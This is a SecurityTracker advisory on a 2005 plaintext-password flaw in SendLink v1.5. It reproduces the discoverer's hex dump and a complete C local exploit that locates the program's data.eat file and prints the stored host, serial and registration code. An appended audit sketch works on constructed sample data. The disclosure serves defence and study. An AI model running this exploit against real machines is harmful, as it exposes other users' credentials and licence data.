SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Generic)  >   SendLink
Vendors:   Computer Knacks, Inc.
SendLink Discloses Passwords to Local Users
SecurityTracker Alert ID:  1013269
SecurityTracker URL:  http://securitytracker.com/id/1013269
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 23 2005
Impact:   Disclosure of authentication information

Version(s): 1.5
Description:   Kozan reported a vulnerability in SendLink. A local user can obtain passwords.

The software stores passwords in 'Program Files\SendLink\User\data.eat' in plaintext form. A local user can view the file to obtain the passwords.

Impact:   A local user can obtain passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.computerknacks.com/
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SendLink v1.5 discloses passwords to local users.


---------------------
Application:
---------------------


SendLink v1.5


---------------------
Introduction:
---------------------

Vendor: Computer Knacks
http://www.computerknacks.com/

Vendor Description: Share your files and folders by emailing tiny 'links'
to the people you want to share with. SendLink allows you to share either
individual files or entire folders--up to your whole hard drive--with a
single link. The recipient of your file-sharing email simply clicks on these
links to download directly from your PC to theirs using software every
Internet user already has, the same exact way they would download files from
a Web site. Version 1.5 improvements: the new 'SendTo' feature integrates
SendLink into the Windows Explorer SendTo menu, further simplifying the
process of creating and sending links.



---------------------
Bug:
---------------------


SendLink v1.5 stores all the information and passwords in the
"Program Files\SendLink\User\data.eat"
file in plain text format without encryption, and the file can be viewed
by a local user with a hex editor.


An example hex editor output:

00000038 686F 7374 6970 BB3D AB31 302E 302E 302E 36BB 20AB 686F 7374 6E61 6D65
hostip.=.10.0.0.6. .hostname
00000054 BB3D AB68 6F73 746E 616D 6531 BB20 AB73 6572 6961 6CBB 3DAB 5345 5249
.=.hostname1. .serial.=.SERI
00000070 414C 4E55 4D42 4552 BB20 AB6F 7074 696F 6E73 BB3D AB50 524F 4455 4354
ALNUMBER. .options.=.PRODUCT
0000008C 4F50 5449 4F4E 53BB 20AB 7265 6763 6F64 65BB 3DAB 5245 4743 4F44 45BB
OPTIONS. .regcode.=.REGCODE.
000000A8 20AB 686F 7374 706F 7274 BB3D AB34 3931 3732 BB                       
.hostport.=.49172.


---------------------
Vendor Confirmed:
---------------------
No.


---------------------
Fix:
---------------------
There is no solution at the time of this entry.



---------------------
Exploit:
---------------------



/*****************************************************************

SendLink v1.5 Local Exploit by Kozan

Application: SendLink v1.5
Vendor:Computer Knacks
http://www.computerknacks.com/

Vulnerable Description: SendLink v1.5 discloses passwords to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <windows.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *hostip, *hostname, *serial, *options, *regcode, *hostport;

int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               /* nothing to close: fopen failed */
               return -1;
       }

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i<strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i>0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i > ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

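char *oku(char *FilePath,char *Str)
{

       FILE *di;
       int cr;                 /* int, so EOF can be told apart from data */
       int i=0;
       /* static: the original returned a pointer to a stack array.
          The contents are only valid until the next call. */
       static char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       /* copy up to the 0xBB terminator, EOF, or a full buffer */
       while( i < (int)sizeof(Feature)-1 && (cr=getc(di)) != EOF )
       {
               if(cr == 0xBB)
                       break;

               Feature[i] = (char)cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}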

int main(void)
{
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
        {

                lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                        (LPBYTE) prgfiles, &dwBufLen);

                if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
                {
                        RegCloseKey(hKey);
                        printf("An error occurred!\n");
                        return 0;
                }

                RegCloseKey(hKey);

        }
        else
        {
                /* the key was never opened, so there is no handle to close */
                printf("An error occurred!\n");
                return 0;
        }

        strcat(prgfiles,"\\SendLink\\User\\data.eat");

        printf("SendLink v1.5 Local Exploit by Kozan\n");
        printf("Credits to ATmaCA\n");
        printf("www.netmagister.com  -  www.spyinstructors.com \n\n");

        try
        {
                char hostip_temp[BUFSIZE];
                wsprintf(hostip_temp,"hostip%c=%c",0xBB,0xAB);
                hostip=oku(prgfiles,hostip_temp);
                printf("Host IP: %s\n",hostip);

                char hostname_temp[BUFSIZE];
                wsprintf(hostname_temp,"hostname%c=%c",0xBB,0xAB);
                hostname=oku(prgfiles,hostname_temp);
                printf("Hostname                        : %s\n",hostname);

                char hostport_temp[BUFSIZE];
                wsprintf(hostport_temp,"hostport%c=%c",0xBB,0xAB);
                hostport=oku(prgfiles,hostport_temp);
                printf("Host Port                        : %s\n",hostport);

                char options_temp[BUFSIZE];
                wsprintf(options_temp,"options%c=%c",0xBB,0xAB);
                options=oku(prgfiles,options_temp);
                printf("Options                                : %s\n",options);

                char serial_temp[BUFSIZE];
                wsprintf(serial_temp,"serial%c=%c",0xBB,0xAB);
                serial=oku(prgfiles,serial_temp);
                printf("Serial                                : %s\n",serial);

                char regcode_temp[BUFSIZE];
                wsprintf(regcode_temp,"regcode%c=%c",0xBB,0xAB);
                regcode=oku(prgfiles,regcode_temp);
                printf("Registration Code        : %s\n",regcode);

        }catch(...){ printf("An error occurred!\n"); return 0; }

        return 0;

}



Kozan...
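
An audit-side sketch, added here and not part of the advisory or of Kozan's message: it walks the record layout visible in the hex dump (key, 0xBB '=' 0xAB, value, 0xBB) and reports which fields sit in the file unencrypted, keeping only key names and value lengths. The sample buffer is constructed, and the function names, the leading 0xAB before the first key and the choice of `serial` and `regcode` as sensitive keys are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
/* Constructed sample in the record layout of the advisory's hex dump:
   key 0xBB '=' 0xAB value 0xBB, records joined by ' ' 0xAB. Placeholder values. */
static const unsigned char SAMPLE[] =
    "\xABhostip\xBB=\xAB" "10.0.0.6\xBB \xABserial\xBB=\xABSERIALNUMBER\xBB \xAB"
    "regcode\xBB=\xABREGCODE\xBB \xABhostport\xBB=\xAB" "49172\xBB";
/* Keys treated as secrets: an assumption of this example, taken from the dump. */
static const char *SENSITIVE[] = { "serial", "regcode" };
struct finding { char key[32]; size_t value_len; int sensitive; int plaintext; };

/* Walk the records; keep key names, value lengths and flags, never the values. */
size_t audit_records(const unsigned char *buf, size_t len, struct finding *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 2 < len && n < max; i++) {
        if (buf[i] != 0xBB || buf[i + 1] != '=' || buf[i + 2] != 0xAB) continue;
        size_t ks = i, vs = i + 3, ve = vs;
        while (ks > 0 && buf[ks - 1] != 0xAB) ks--;       /* back to key start */
        while (ve < len && buf[ve] != 0xBB) ve++;         /* forward to value end */
        if (ve == len) break;                             /* truncated record */
        if (i == ks || i - ks >= sizeof out[n].key) continue;   /* malformed key */
        struct finding *f = &out[n++];
        memcpy(f->key, buf + ks, i - ks);
        f->key[i - ks] = '\0';
        f->value_len = ve - vs; f->sensitive = 0; f->plaintext = 1;
        for (size_t s = 0; s < sizeof SENSITIVE / sizeof *SENSITIVE; s++)
            if (strcmp(f->key, SENSITIVE[s]) == 0) f->sensitive = 1;
        for (size_t v = vs; v < ve; v++)                  /* readable as-is? */
            if (!isprint(buf[v])) f->plaintext = 0;
        i = ve;                                           /* resume after value */
    }
    return n;
}
/* Number of sensitive fields whose value is readable without any decoding. */
size_t count_plaintext_secrets(const struct finding *f, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += f[i].sensitive && f[i].plaintext && f[i].value_len > 0;
    return hits;
}
int main(void)
{
    struct finding f[16];
    size_t n = audit_records(SAMPLE, sizeof SAMPLE - 1, f, 16);
    for (size_t i = 0; i < n; i++)
        printf("%-8s %2zu bytes%s\n", f[i].key, f[i].value_len,
               f[i].sensitive && f[i].plaintext ? "  SECRET IN CLEAR" : "");
    return count_plaintext_secrets(f, n) != 0;
}
```

A non-zero exit status means at least one sensitive field is stored in the clear; a stored value that fails the printable check would be reported without the flag.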
 
 



Copyright 2020, SecurityGlobal.net LLC